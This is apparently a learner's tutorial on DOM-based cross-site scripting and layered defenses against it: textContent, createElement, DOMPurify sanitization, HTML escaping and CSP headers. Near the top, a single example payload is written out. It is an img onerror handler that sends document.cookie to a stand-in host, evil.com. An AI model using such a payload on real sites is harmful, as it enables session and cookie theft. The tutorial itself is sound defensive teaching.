XSS (Cross-Site Scripting)
Cross-Site Scripting (XSS) happens when an attacker injects malicious code into a web page, and the browser executes it as if it were part of the original site.
The most common DOM-based XSS vector is innerHTML. When I use innerHTML to insert a string, the browser parses that string as HTML — creating real elements, including elements that can execute JavaScript.
// A user types this into a form field:
const userInput = '<img src="x" onerror="document.location=\'https://evil.com/steal?\'+document.cookie">';
// Your code puts it on the page with innerHTML:
element.innerHTML = userInput;
// → Browser creates a real <img> element
// → Image fails to load → onerror fires
// → Attacker's script runs with full page access
// → User's cookies are sent to the attacker's server

The attacker didn't need access to the server. They exploited the fact that innerHTML parses strings as HTML.
The Safe Code Path
The safest pattern for putting user-provided content into the DOM avoids HTML parsing entirely:
// Create the element programmatically
const paragraph = document.createElement('p');
// Set its text with textContent (no parsing!)
paragraph.textContent = userInput;
// Add it to the page
container.appendChild(paragraph);
// Even if userInput contains <script> tags or onerror handlers,
// they display as literal text, never executed

No HTML string is ever parsed, so no injection is possible. This is the safest path.
The Safety Hierarchy
createElement + textContent (Safest)
Build elements programmatically and set text with textContent. No HTML parsing happens at all. This is the default choice for any user-provided content.
createElement + appendChild (Programmatic, Safe)
Build complex DOM structures entirely with createElement, setAttribute, and appendChild. More verbose, but no parsing means no injection.
innerHTML + DOMPurify (Library Sanitization)
When you need to render rich HTML (like formatted text from a CMS), sanitize it first with a library like DOMPurify. It strips dangerous elements and attributes before they reach the DOM.
CSP Headers (Server-Side Safety Net)
Content Security Policy headers tell the browser which scripts are allowed to run. Even if an XSS vulnerability exists in the code, CSP can prevent the injected script from executing.
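The hierarchy above applies when writing to the live DOM. When code instead has to build an HTML string (server-side templates, for example), the counterpart of textContent is escaping. A minimal sketch, where escapeHTML is a hypothetical helper rather than any built-in or library function:

```javascript
// Hypothetical helper: escape the five characters that are
// significant in HTML text and attribute contexts.
function escapeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first, or later entities get double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// A payload like the one from earlier becomes inert text:
const payload = '<img src="x" onerror="alert(1)">';
console.log(escapeHTML(payload));
// → &lt;img src=&quot;x&quot; onerror=&quot;alert(1)&quot;&gt;
```

Like textContent, this turns markup into literal characters; unlike textContent, the caller is responsible for applying it at every interpolation point, which is why the programmatic DOM path is still preferable when available.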
Sanitization Libraries
Sometimes I need to insert HTML — for example, rendering formatted content from a database. In those cases, I sanitize the HTML before inserting it.
import DOMPurify from 'dompurify';
// Sanitize before inserting
const cleanHTML = DOMPurify.sanitize(untrustedHTML);
element.innerHTML = cleanHTML;
// DOMPurify strips:
// - <script> tags
// - onerror, onclick, and other event handlers
// - javascript: URLs
// - Other dangerous patterns

DOMPurify is the most widely used DOM sanitization library. Always use version 3.2.4 or higher.
🟠 Important:
Sanitization is a fallback, not a first choice. If I can use textContent instead of innerHTML, I do. Sanitization libraries are for the cases where I genuinely need HTML rendering.
CSP Headers
Content Security Policy (CSP) is a server-side defense. It tells the browser which sources are allowed for scripts, styles, images, and other resources.
[[headers]]
for = "/*"
[headers.values]
Content-Security-Policy = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' https://res.cloudinary.com"

This policy only allows scripts from the same origin, so injected inline scripts would be blocked by the browser.
CSP can also be set via a <meta> tag in the HTML head, or through edge functions that add headers dynamically.
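As a sketch, the meta-tag form of a similar same-origin policy looks like this (note that some directives, such as frame-ancestors and report-uri, are ignored when CSP is delivered via a meta tag):

```html
<!-- Same-origin-only policy delivered from the HTML itself -->
<meta http-equiv="Content-Security-Policy"
      content="default-src 'self'; script-src 'self'">
```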
Defense in Depth
Security works best in layers. No single defense is perfect, so I learned to combine them:
Level 1: Code Decisions
Use textContent instead of innerHTML. Build elements with createElement. Sanitize with DOMPurify when HTML rendering is required. These are decisions I make every time I write code.
Level 2: Server Configuration
Set CSP headers to restrict what the browser will execute. Even if a vulnerability slips through my code, CSP can block the attack from succeeding.
🟠 My Takeaway:
I don't rely on any single defense. I write safe code and configure server protections. If one layer fails, the other is still there.
Looking Ahead
In Testing Lab Week 3, I'll add automated security tools to my workflow: ESLint rules that flag dangerous DOM methods, npm audit to check for vulnerable dependencies, and Dependabot to keep packages updated automatically.
Security isn't a one-time decision — it's a habit that gets reinforced with the right tools. 🟠